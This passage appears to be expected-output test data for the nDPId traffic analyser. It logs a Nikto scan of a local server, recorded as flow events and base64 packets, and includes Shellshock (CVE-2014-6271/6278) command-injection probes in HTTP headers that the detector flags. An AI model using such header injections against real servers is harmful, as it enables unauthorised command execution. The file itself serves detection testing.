{"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277349,"pkt":"AAAAAAAAAAAAAAAACABFAADCefJAAEAGwkF\/AAABfwAAAcTiH5DNN0FKl3iI04AYAED+tgAAAQEICp1m\/Y2dZv2MR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277350,"pkt":"AAAAAAAAAAAAAAAACABFAADCI4FAAEAGGLN\/AAABfwAAAcTkH5CTwxvH1PwL8oAYAED+tgAAAQEICp1m\/Y6dZv2OR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277352,"pkt":"AAAAAAAAAAAAAAAACABFAADBrJpAAEAGj5p\/AAABfwAAAcTmH5B1JpQjd4rcfoAYAED+tQAAAQEICp1m\/ZCdZv2QR0VUIC9mYXZpY29uLmljbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277354,"pkt":"AAAAAAAAAAAAAAAACABFAADKIPlAAEAGGzN\/AAABfwAAAcToH5DzJBhOnEiKeoAYAED+vgAAAQEICp1m\/ZKdZv2SR0VUIC9mYXZpY29ucy9mYXZpY29uLmljbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277355,"pkt":"AAAAAAAAAAAAAAAACABFAADBHndAAEAGHb5\/AAABfwAAAcTqH5Ag4SbPDIJk5IAYAED+tQAAAQEICp1m\/ZOdZv2TR0VUIC9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277357,"pkt":"AAAAAAAAAAAAAAAACABFAADKgAdAAEAGvCR\/AAABfwAAAcTsH5DBK7i\/eaGnm4AYAED+vgAAAQEICp1m\/ZWdZv2UR0VUIC9mYXZpY29ucy9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277358,"pkt":"AAAAAAAAAAAAAAAACABFAADByl9AAEAGcdV\/AAABfwAAAcTuH5C2YPLn77QmvYAYAED+tQAAAQEICp1m\/ZadZv2WR0VUIC9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277359,"pkt":"AAAAAAAAAAAAAAAACABFAADK7Z9AAEAGTox\/AAABfwAAAcTwH5DcrNUiTS0awIAYAED+vgAAAQEICp1m\/ZedZv2XR0VUIC9mYXZpY29ucy9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCg0K"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420277361,"pkt":"AAAAAAAAAAAAAAAACABFAAC2klBAAEAGqe9\/AAABfwAAAcTyH5D2pKrzJKNAbIAYAED+qgAAAQEICp1m\/ZmdZv2ZR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277375,"pkt":"AAAAAAAAAAAAAAAACABFAAEBYRtAAEAG2tl\/AAABfwAAAcUGH5Bwr1nakn6kY4AYAED+9QAAAQEICp1m\/aedZv2nR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277378,"pkt":"AAAAAAAAAAAAAAAACABFAAEBjFVAAEAGr59\/AAABfwAAAcUIH5BgqrSU8g64oYAYAED+9QAAAQEICp1m\/aqdZv2qR0VUIC8gSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 